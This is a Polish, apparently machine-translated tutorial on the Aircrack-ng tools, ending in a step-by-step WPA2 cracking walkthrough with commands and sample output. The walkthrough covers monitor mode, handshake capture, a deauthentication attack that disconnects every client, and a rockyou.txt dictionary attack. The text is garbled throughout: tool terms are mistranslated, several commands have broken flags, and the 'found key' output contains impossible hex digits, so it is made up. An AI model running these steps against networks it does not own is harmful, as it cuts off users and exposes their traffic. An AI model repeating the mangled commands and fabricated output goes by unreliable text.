Jak korzystać z Aircrack-NG

Jak korzystać z Aircrack-NG
Przez większość czasu ludzie nigdy nie myślą o sieci, z którą są połączeni. Nigdy nie myślą, jak bezpieczna jest ta sieć i jak bardzo ryzykują swoje poufne dane na co dzień. Możesz prowadzić kontrole podatności na sieci WiFi za pomocą bardzo mocnego narzędzia o nazwie Aircrack-ng i Wireshark. Wireshark służy do monitorowania aktywności sieciowej. Aircrack-ng jest bardziej jak agresywne narzędzie, które pozwala hakować i zapewniać dostęp do połączeń bezprzewodowych. Myślenie jako intruzu zawsze było najbezpieczniejszym sposobem ochrony przed hackiem. Być może będziesz w stanie zrozumieć dokładne działania, jakie intruz podejmie, aby uzyskać dostęp do systemu, poznając AirCrack. Następnie możesz przeprowadzić kontrole zgodności w swoim systemie, aby upewnić się, że nie jest on niepewny.

Aircrack-ng to pełny zestaw oprogramowania zaprojektowanego do testowania bezpieczeństwa sieci Wi -Fi. To nie tylko jedno narzędzie, ale zbiór narzędzi, z których każdy wykonuje określony cel. Można opracować różne obszary bezpieczeństwa Wi -Fi, takie jak monitorowanie punktu dostępu, testowanie, atakowanie sieci, pękanie sieci Wi -Fi i testowanie. Kluczowym celem Aircrack jest przechwycenie pakietów i rozszyfrowanie skrótów w celu rozbicia haseł. Obsługuje prawie wszystkie nowe interfejsy bezprzewodowe. Aircrack-ng to ulepszona wersja przestarzałego apartamentu narzędziowego, Ng odnosi się do Nowe pokolenie. Niektóre z niesamowitych narzędzi, które współpracują w celu wydawania większego zadania.

Airmon-NG:

Airmon-NG znajduje się w zestawie Aircrack-NG, który umieszcza kartę interfejsu sieciowego w trybie monitorowania. Karty sieciowe zwykle akceptują tylko pakiety skierowane do nich zgodnie z definicją adresu MAC NIC, ale w przypadku Airmon-NG wszystkie pakiety bezprzewodowe, niezależnie od tego, czy są one dla nich ukierunkowane, czy nie, również zostaną zaakceptowane. Powinieneś być w stanie złapać te pakiety bez łączenia lub uwierzytelniania z punktem dostępu. Służy do sprawdzenia statusu punktu dostępu poprzez umieszczenie interfejsu sieciowego w trybie monitorowania. Najpierw trzeba skonfigurować karty bezprzewodowe, aby włączyć tryb monitorowania, a następnie zabić wszystkie procesy tła, jeśli uważasz, że jakikolwiek proces się z nim zakłóca. Po zakończeniu procesów tryb monitorowania można włączyć na interfejsie bezprzewodowym, uruchamiając poniższe polecenie:

Ubuntu@ubuntu: ~ $ sudo airmon-ng start wlan0 #

Możesz także wyłączyć tryb monitorowania, zatrzymując AirMon-NG w dowolnym momencie, używając poniższego polecenia:

Ubuntu@ubuntu: ~ $ sudo airmon-ng stop Wlan0 #

Airodump-ng:

Airodump-NG służy do wymienienia wszystkich otaczających nas sieci i do przeglądania cennych informacji na ich temat. Podstawową funkcją Airodump-Ng jest wąchanie pakietów, więc zasadniczo zaprogramowane jest chwytanie wszystkich pakietów wokół nas, jednocześnie umieszczając w trybie monitorowania. Będziemy uruchomić go w stosunku do wszystkich połączeń wokół nas i zbieramy dane, takie jak liczba klientów podłączonych do sieci, odpowiadające im adresy MAC, styl szyfrowania i nazwy kanałów, a następnie zaczniesz celować w naszą sieć docelową.

Wpisując polecenie Airodump-NG i podając mu nazwę interfejsu sieciowego jako parametr, możemy aktywować to narzędzie. Wymienia wszystkie punkty dostępu, ilość zastosowanych metod pakietów danych, szyfrowania i uwierzytelniania oraz nazwę sieci (ESSID). Z punktu widzenia hakowania adresy MAC są najważniejszymi dziedzinami.

Ubuntu@ubuntu: ~ $ sudo airodump-ng wlx0mon

Aircrack-NG:

Aircrack służy do pękania haseł. Po schwytaniu wszystkich pakietów za pomocą Airodump, możemy złamać klucz przez Aircrack. Pęka te klucze przy użyciu dwóch metod PTW i FMS. Podejście PTW odbywa się w dwóch fazach. Początkowo używane są tylko pakiety ARP i tylko wtedy, jeśli klucz nie jest pęknięty po wyszukiwaniu, używa wszystkich innych przechwyconych pakietów. Plusem podejścia PTW jest to, że nie wszystkie pakiety są używane do pękania. W drugim podejściu, ja.mi., FMS, używamy zarówno modeli statystycznych, jak i algów brutalnej siły do ​​pękania klucza. Można również zastosować metodę słownika.

Aireplay-ng:

Airplay-NG wprowadza pakiety do sieci bezprzewodowej w celu tworzenia lub przyspieszenia ruchu. Pakiety z dwóch różnych źródeł mogą zostać uchwycone przez Aireplay-Ng. Pierwsza to sieć na żywo, a druga to pakiety z już istniejącego pliku PCAP. Airplay-NG jest przydatne podczas ataku dezorientacji, który jest ukierunkowany na bezprzewodowy punkt dostępu i użytkownika. Ponadto możesz wykonywać niektóre ataki, takie jak Atak kawy Latte z Airplay-NG, narzędziem, które pozwala uzyskać klucz z systemu klienta. Możesz to osiągnąć, łapiąc pakiet ARP, a następnie manipulując go i odsyłając z powrotem do systemu. Klient następnie utworzy pakiet, który można uchwycić przez Airodump, a AirCrack pęknie klucz z tego zmodyfikowanego pakietu. Niektóre inne opcje ataku Airplay-NG obejmują Chopchop, Fragment Arepreplay itp.

Airbase-NG:

Airbase-NG służy do przekształcenia komputera intruza w skompromitowany punkt połączenia, aby inni mogli się z nią połączyć. Korzystając z Airbase-NG, możesz twierdzić, że jest legalnym punktem dostępu i przeprowadzić ataki man-in-the-middle na komputery dołączone do Twojej sieci. Tego rodzaju ataki nazywane są złymi atakami bliźniaczymi. Podstawowi użytkownicy nie mogą rozróżniać między prawnym punktem dostępu a fałszywym punktem dostępu. Tak więc złe zagrożenie jest jednym z najbardziej groźnych zagrożeń bezprzewodowych, przed którymi stoi dzisiaj.

Airolib-Ng:

Airolib przyspiesza proces hakowania, przechowując i zarządzając listami haseł i punkt dostępu. System zarządzania bazą danych używany przez ten program to SQLITE3, który jest głównie dostępny na wszystkich platformach. Pękanie haseł obejmuje obliczanie klucza głównego para, za pomocą którego wyodrębnia się kluczowy klucz przejściowy (PTK). Za pomocą PTK możesz określić kod identyfikacji wiadomości ramki (MIC) dla danego pakietu i teoretycznie uważać, że mikrofon jest podobny do pakietu, więc jeśli PTK było właściwe, PMK również było dobrze.

Aby zobaczyć listy haseł i sieci dostępu przechowywane w bazie danych, wpisz następujące polecenie:

Ubuntu@ubuntu: ~ $ sudo airolib -ng testDatabase -Stats

Tutaj TestDatabase to DB, do którego chcesz uzyskać dostęp lub tworzyć, a -Stats to operacja, którą chcesz wykonać. Możesz wykonywać wiele operacji na polach bazy danych, na przykład nadać maksymalne priorytet niektórym SSID lub coś w tym rodzaju. Aby użyć Airolib-Ng z Aircrack-NG, wprowadź następujące polecenie:

Ubuntu@ubuntu: ~ $ sudo aircrack -ng -r testDatabase WPA2.Eapol.czapka

Tutaj używamy już obliczonego PMK przechowywanego w TestDatabaza do przyspieszenia procesu pękania haseł.

Pękanie WPA/WPA2 za pomocą Aircrack-NG:

Spójrzmy na niewielki przykład tego, co Aircrack-NG może zrobić z pomocą kilku niesamowitych narzędzi. Zakręcimy klucz wstępny WPA/WPA2 za pomocą metody słownika.

Pierwszą rzeczą, którą musimy zrobić, to wymienić interfejsy sieciowe, które obsługują tryb monitorowania. Można to zrobić za pomocą następującego polecenia:

Ubuntu@ubuntu: ~ $ sudo airmon-ng
Chipset sterownika PHY interfejs
PHY0 WLX0 RTL8XXXU RealTek Semiconductor Corp.

Widzimy interfejs; Teraz musimy umieścić interfejs sieciowy, który znaleźliśmy (WLX0) w trybie monitorowania za pomocą następującego polecenia:

Ubuntu@ubuntu: ~ $ sudo airmon-ng start wlx0

Włączył tryb monitorowania na wywoływanym interfejsie WLX0MON.

Teraz powinniśmy zacząć słuchać transmisji przez pobliskie routery za pośrednictwem naszego interfejsu sieciowego, który wprowadziliśmy w tryb monitorowania.

Ubuntu@ubuntu: ~ $ sudo airodump-ng wlx0mon
CH 5] [upłynął: 30 s] [2020-12-02 00:17
BSSID PWR BEACONS #DATA, #/S CH CH MB ENC Cipher Auth Essid
E4: 6F: 13: 04: CE: 31 -45 62 27 0 1 54E WPA2 CCMP PSK Crackit
C4: E9: 84: 76: 10: Be -63 77 0 0 6 54e. WPA2 CCMP PSK Hackme
C8: 3a: 35: A0: 4e: 01 -63 84 0 0 8 54e WPA2 CCMP PSK Net07
74: DA: 88: FA: 38: 02 -68 28 2 0 11 54E WPA2 CCMP PSK TP -Link_3802
BSSID Station PWR Szybkość utraconej ramy sonda
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -3 0 - 1e 8 5
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -33 1E- 6e 0 3
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -35 0 - 1 0 6
E4: 6F: 13: 04: CE: 31 BC: 91: B5: F8: 7e: D5 -39 0E- 1 1002 13

Nasza sieć docelowa to Rozwal to W takim przypadku, który obecnie działa na kanale 1.

Tutaj, aby złamać hasło sieci docelowej, musimy uchwycić 4-kierunkowy uścisk dłoni, który ma miejsce, gdy urządzenie próbuje połączyć się z siecią. Możemy go uchwycić za pomocą następującego polecenia:

Ubuntu@ubuntu: ~ $ sudo airodump -ng -c 1 - -bssid e4: 6f: 13: 04: CE: 31 -w /home wlx0

-C : Kanał

-BSSID: BSSID sieci docelowej

-w : Nazwa katalogu, w którym zostanie umieszczony plik PCAP

Teraz musimy poczekać, aż urządzenie się połączy z siecią, ale istnieje lepszy sposób na uchwycenie uścisku dłoni. Możemy dezertyzować urządzenia do AP za pomocą ataku deauterykacji za pomocą następującego polecenia:

Ubuntu@Ubuntu: ~ $ sudo aireplay -ng -0 -a e4: 6f: 13: 04: CE: 31

A: BSSID sieci docelowej

-0: Atak deauterykacyjny

Odłączyliśmy wszystkie urządzenia, a teraz musimy poczekać, aż urządzenie się połączy z siecią.

CH 1] [Upłynął: 30 s] [2020-12-02 00:02] [UBRY WPA: E4: 6F: 13: 04: CE: 31
BSSID PWR RXQ Beacons #Data, #/s CH CH MB ENC Cipher Auth E
E4: 6F: 13: 04: CE: 31 -47 1 228 807 36 1 54E WPA2 CCMP PSK P
BSSID Station PWR Szybkość utraconej ramy sonda
E4: 6F: 13: 04: CE: 31 pne: 91: B5: F8: 7e: D5 -35 0 - 1 0 1
E4: 6F: 13: 04: CE: 31 5C: 3A: 45: D7: EA: 8B -29 0E- 1E 0 22
E4: 6F: 13: 04: CE: 31 88: 28: B3: 30: 27: 7e -31 0e- 1 0 32
E4: 6F: 13: 04: CE: 31 D4: 67: D3: C2: CD: D7 -35 0E- 6e 263 708 Crackit
E4: 6F: 13: 04: CE: 31 D4: 6A: 6A: 99: ED: E3 -35 0E- 0E 0 86
E4: 6F: 13: 04: CE: 31 5C: C3: 07: 56: 61: EF -37 0 - 1e 0 1

Dostaliśmy hit i patrząc na prawy górny róg tuż obok czasu, widzimy, że uścisk dłoni został schwytany. Teraz spójrz w określonym folderze ( /dom w naszym przypadku) dla „.PCAP" plik.

Aby złamać klucz WPA, możemy użyć następującego polecenia:

Ubuntu@ubuntu: ~ $ sudo aircrack -ng -a2 -w rockyou.txt -b e4: 6f: 13: 04: CE: 31.czapka
B: BSSID sieci docelowej
-A2: tryb WPA2
Rockyou.TXT: Używany plik słownika
Uścisk dłoni.CAP: plik zawierający schwytany uścisk dłoni
Aircrack-Ng 1.2 beta3
[00:01:49] 10566 Testowane klucze (1017.96 K/s)
Klucz znaleziony! [ masz mnie ]
Klucz główny: 8d EC 0c EA D2 BC 6B H7 J8 K1 A0 89 6B 7B 6D
0c 06 08 ED BC 6B H7 J8 K1 A0 89 6B 7B B F7 6F 50 C
Klucz przejściowy: 4D C4 5R 6T 76 99 6G 7H 8D EC
H7 J8 K1 A0 89 6B 7B 6D AF 5B 8D 2D A0 89 6B
A5 BD K1 A0 89 6B 0C 08 0C 06 08 ED BC 6B H7 J8 K1 A0 89
8D EC 0C EA D2 BC 6B H7 J8 K1 A0 89 6B
MAC: CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71

Klucz do naszej sieci docelowej został pomyślnie złamany.

Wniosek:

Sieci bezprzewodowe są wszędzie, używane przez każdą firmę, od pracowników korzystających z smartfonów po urządzenia kontrolne przemysłowe. Według badań prawie ponad 50 procent ruchu internetowego będzie ponad Wi -Fi w 2021 roku. Sieci bezprzewodowe mają wiele zalet, komunikacja poza drzwiami, szybki dostęp do Internetu w miejscach, w których położenie przewodów jest prawie niemożliwe, może rozszerzyć sieć bez instalowania kabli dla innego użytkownika i mogą łatwo podłączyć Twoje urządzenia mobilne do biur domowych, podczas gdy jesteś tam.

Pomimo tych zalet, istnieje duży znak zapytania dotyczący Twojej prywatności i bezpieczeństwa. Jak te sieci; W zakresie transmisji routerów są otwarte dla wszystkich, można je łatwo zaatakować, a twoje dane można łatwo zagrożić. Na przykład, jeśli jesteś podłączony do niektórych publicznych Wi -Fi, każdy podłączony do tej sieci może łatwo sprawdzić ruch sieci.